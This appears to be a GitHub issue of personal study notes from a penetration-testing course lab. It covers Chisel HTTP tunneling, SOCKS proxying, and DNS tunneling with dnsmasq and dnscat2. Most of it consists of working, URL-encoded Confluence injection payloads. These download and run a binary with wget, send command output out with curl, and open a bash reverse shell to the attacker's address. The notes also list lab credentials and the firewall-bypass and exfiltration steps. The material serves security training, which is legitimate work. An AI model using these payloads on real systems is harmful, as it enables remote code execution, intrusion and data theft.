Open WDavid404 opened 6 months ago
Chisel: an HTTP tunneling tool that encapsulates our data stream within HTTP.
Chisel uses a client/server model. A Chisel server must be set up, which can accept a connection from the Chisel client.
The traffic between the Chisel client and server is all HTTP-formatted. The Chisel server on our Kali machine will listen on TCP port 1080, a SOCKS proxy port. All traffic sent to that port will be passed back up the HTTP tunnel to the Chisel client, where it will be forwarded wherever it's addressed.
Before we start the server, we should copy the Chisel client binary to CONFLUENCE01. The Chisel server and client are actually run from the same binary, they're just initialized with either server or client as the first argument.
on CONFLUENCE01
wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel
Next, we'll format this command to work with our curl Confluence injection payload.
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/
(翻译:curl http://192.168.50.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.118.4/chisel -O /tmp/chisel && chmod +x /tmp/chisel').start()")}/
)
On the Kali
kali@kali:~$ chisel server --port 8080 --reverse
run tcpdump on our Kali machine to log incoming traffic.
kali@kali:~$ sudo tcpdump -nvvvXi tun0 tcp port 8080
Convert
/tmp/chisel client 192.168.118.4:8080 R:socks > /dev/null 2>&1 &
to
kali@kali:~$ curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/
翻译:
curl http://192.168.50.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','/tmp/chisel client 192.168.118.4:8080 R:socks').start()")}/
However, nothing happens. We don't see any traffic hit our Tcpdump session, and the Chisel server output doesn't show any activity.
To read the command output, we can construct a command which redirects stdout and stderr output to a file, and then send the contents of that file over HTTP back to our Kali machine.
We use the &> operator, which directs all streams to stdout, and write it to /tmp/output.
/tmp/chisel client 192.168.118.4:8080 R:socks &> /tmp/output; curl --data @/tmp/output http://192.168.118.4:8080/
kali@kali:~$ curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%20%26%3E%20/tmp/output%20%3B%20curl%20--data%20@/tmp/output%20http://192.168.118.4:8080/%27%29.start%28%29%22%29%7D/
On sending this new injection, we check Tcpdump output for attempted connections.
Chisel is trying to use versions 2.32 and 2.34 of glibc, which the CONFLUENCE01 server does not have.
kali@kali:~$ chisel -h
Usage: chisel [command] [--help]
Version: 1.8.1-0kali2 (go1.20.7)
On the Chisel Github page, we find an "official" compiled binary, also version 1.81, is compiled with Go version 1.19. Donwload it and redo the steps above...
After the connection btw chisel server and client set up, login to SSH server on DB server In Port Redirection and SSH Tunneling, we created SOCKS proxy ports with both SSH remote and classic dynamic port forwarding, and used Proxychains to push non-SOCKS-native tools through the tunnel. But we've not yet actually run SSH itself through a SOCKS proxy.
SSH doesn't offer a generic SOCKS proxy command-line option. Instead, it offers the ProxyCommand configuration option. We can either write this into a configuration file, or pass it as part of the command line with -o.
ProxyCommand accepts a shell command that is used to open a proxy-enabled channel. The documentation suggests using the OpenBSD version of Netcat, which exposes the -X flag and can connect to a SOCKS or HTTP proxy. However, the version of Netcat that ships with Kali doesn't support proxying.
Instead, we'll use Ncat, the Netcat alternative written by the maintainers of Nmap. We can install this on Kali with sudo apt install ncat.
kali@kali:~$ sudo apt install ncat
kali@kali:~$ ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
# pass an Ncat command to ProxyCommand. The command we construct tells Ncat to use the socks5 protocol and the proxy socket at 127.0.0.1:1080. The %h and %p tokens represent the SSH command host and port values, which SSH will fill in before running the command.
Dnsmasq is DNS server software that requires minimal configuration. A few Dnsmasq configuration files are stored in the ~/dns_tunneling folder.
kali@felineauthority:~/dns_tunneling$ sudo dnsmasq -C dnsmasq.conf -d
we can transfer small amounts of information (exfiltrated data) from inside the network to the outside, without a direct connection, just by making DNS queries. How to send a binary file by exfiltration? A: We could convert a binary file into a long hex string representation, split this string into a series of smaller chunks, then send each chunk in a DNS request for [hex-string-chunk].feline.corp. On the server side, we could log all the DNS requests and convert them from a series of hex strings back to a full binary.
The TXT record is designed to be general-purpose, and contains "arbitrary string information". We can serve TXT records from FELINEAUTHORITY using Dnsmasq. First, we'll kill our previous dnsmasq process with a C+c. Then we'll check the contents of dnsmasq_txt.conf and run dnsmasq again with this new configuration.
kali@felineauthority:~/dns_tunneling$ cat dnsmasq_txt.conf
kali@felineauthority:~/dns_tunneling$ sudo dnsmasq -C dnsmasq_txt.conf -d
on PGDATABASE01
If we wanted to infiltrate binary data, we could serve it as a series of Base64 or ASCII hex encoded TXT records, and convert that back into binary on the internal server.
dnscat2 to exfiltrate data with DNS subdomain queries and infiltrate data with TXT (and other) records. dnscat2 uses a client server architecture to tunnel traffic via UDP and/or DNS queries. It can be used to bypass firewalls and execute commands on the machine running the client.
A dnscat2 server runs on an authoritative name server for a particular domain, and clients (which are configured to make queries to that domain) are run on compromised machines.
We'll inspect traffic from FELINEAUTHORITY with tcpdump, filtering specifically on UDP port 53 (udp port 53).
kali@felineauthority:~$ sudo tcpdump -i ens192 udp port 53
Run dnscat2-server, passing the feline.corp domain as the only argument.
kali@felineauthority:~$ dnscat2-server feline.corp
--> dnscat2 server is listening on all interfaces on UDP/53.
run the dnscat2 client binary from the dnscat folder in the database_admin home directory, with the feline.corp domain passed as the only argument.
database_admin@pgdatabase01:~$ cd dnscat/
database_admin@pgdatabase01:~/dnscat$ ./dnscat feline.corp
Creating DNS driver:
domain = feline.corp
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 127.0.0.53
Encrypted session established! For added security, please verify the server also displays this string:
Annoy Mona Spiced Outran Stump Visas
Session established!
The dnscat2 client reports that a session has been established.
We can check for connections back on our dnscat2 server.
kali@felineauthority:~$ dnscat2-server feline.corp
This indicates that the dnscat2 server is listening on all interfaces on UDP/53.
start interacting with our session from the dnscat2 server. Let's list all the active windows with the windows command, then run window -i from our new "command" shell to list the available commands.
Then, Setting up a port forward from FELINEAUTHORITY to PGDATABASE01.
command (pgdatabase01) 1> listen 127.0.0.1:4455 172.16.2.11:445
Listening on 127.0.0.1:4455, sending connections to 172.16.2.11:445
command (pgdatabase01) 1>
From another shell on FELINEAUTHORITY
kali@felineauthority:~$ smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234
In this Learning Unit we used dnscat2 to tunnel SMB traffic through DNS requests and responses. We used that to list the available shares on a host deep inside the internal network, despite the fact that neither HRSHARES or PGDATABASE01 had direct connectivity to our FELINEAUTHORITY server.
10.4.236.215 - PGDATABASE01
192.168.236.63 - CONFLUENCE01
192.168.45.224 - Kali
On Kali,prepare a Chisel tool
https://github.com/jpillora/chisel/releases/tag/v1.9.1
下载对应Kali OS (Linux):chisel_1.9.1_linux_amd64.gz (extract it to get ‘chisel’ file) --》即使Kali VM所在的PC CPU是intel, 也能在kali上运行正常
python3 -m http.server 80
On Kali, chmod a+x ./chisel; ./chisel server --port 8080 -reverse
On Kali, upload chisel file to CONFLUENCE01
curl http://192.168.236.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.224/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/
(encode前的原文:
curl http://192.168.236.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.45.224/chisel -O /tmp/chisel && chmod +x /tmp/chisel').start()")}/
)
--> if success, you can see the log of http.server as below
On Kali, make CONFLUENCE01 run chisel on client mode
curl http://192.168.236.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.224:8080%20R:socks%27%29.start%28%29%22%29%7D/
(encode前的原文:
curl http://192.168.236.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','/tmp/chisel client 192.168.45.224:8080 R:socks').start()")}/
)
---->
ss -ntplu
...
tcp LISTEN 0 4096 127.0.0.1:1080 0.0.0.0:* users:(("chisel",pid=293927,fd=8))
tcp LISTEN 0 4096 *:8080 *:* users:(("chisel",pid=293927,fd=6))
...
since ‘session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening’, config '/etc/proxychains4.conf' to use 1080 port
Download chisel_exercise_client file and chmod it
proxychains ./chisel_exercise_client -i 10.4.236.215 -p 8008
10.4.236.215 - PGDATABASE01
database_admin / sqlpass123
192.168.236.7 - FELINEAUTHORITY
kali / 7he_C4t_c0ntro11er
192.168.236.64 - MULTISERVER03
192.168.236.63 - CONFLUENCE01
172.16.236.217 - HRSHARES
192.168.45.224 - Kali
kali@felineauthority:~/dns_tunneling$ cat dnsmasq_txt.conf
3.kali@felineauthority:~$ dnscat2-server feline.corp
On Kali, login to CONFLUENCE01 by the following command
curl http://192.168.236.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.224/4444%200%3E%261%27%29.start%28%29%22%29%7D/
On CONFLUNCE01, python3 -c 'import pty; pty.spawn("/bin/bash")'
SSH Login to PGDATABASE01 On CONFLUNCE01 ssh database_admin@10.4.236.215
Confirm that there is dnscat tool on PGDATABASE01
database_admin@pgdatabase01:~$ cd dnscat/
database_admin@pgdatabase01:~/dnscat$ ./dnscat feline.corp
on client side (PGDATABASE01): confirm the dns tunnel is established.
on server side (FELINEAUTHORITY): confirm the dns tunnel is established.
dnscat2> windows
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = feline.corp [*]
1 :: command (pgdatabase01) [encrypted, NOT verified] [*]
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
For added security, please ensure the client displays the same string:
Seitan Mcgill Killer Maps Deepen Spiced This is a command session!
That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'.
command (pgdatabase01) 1> ?
Here is a list of commands (use -h on any of them for additional help):
10. Setting up a port forward from FELINEAUTHORITY --> PGDATABASE01-->HRSHARES using dns tunnel .
`command (pgdatabase01) 1> listen 0.0.0.0:4646 172.16.236.217:4646`
where 172.16.236.217 is IP of HRSHARES.
11. On Kali,download dnscat_exercise_client and do 'chmod a+x' for dnscat_exercise_client
12. using port forward built by dns tunnel on FELINEAUTHORITY
` ./dnscat_exercise_client -i 192.168.236.7 -p 4646` where 192.168.236.7 is IP of FELINEAUTHORITY.
https://github.com/nicocha30/ligolo-ng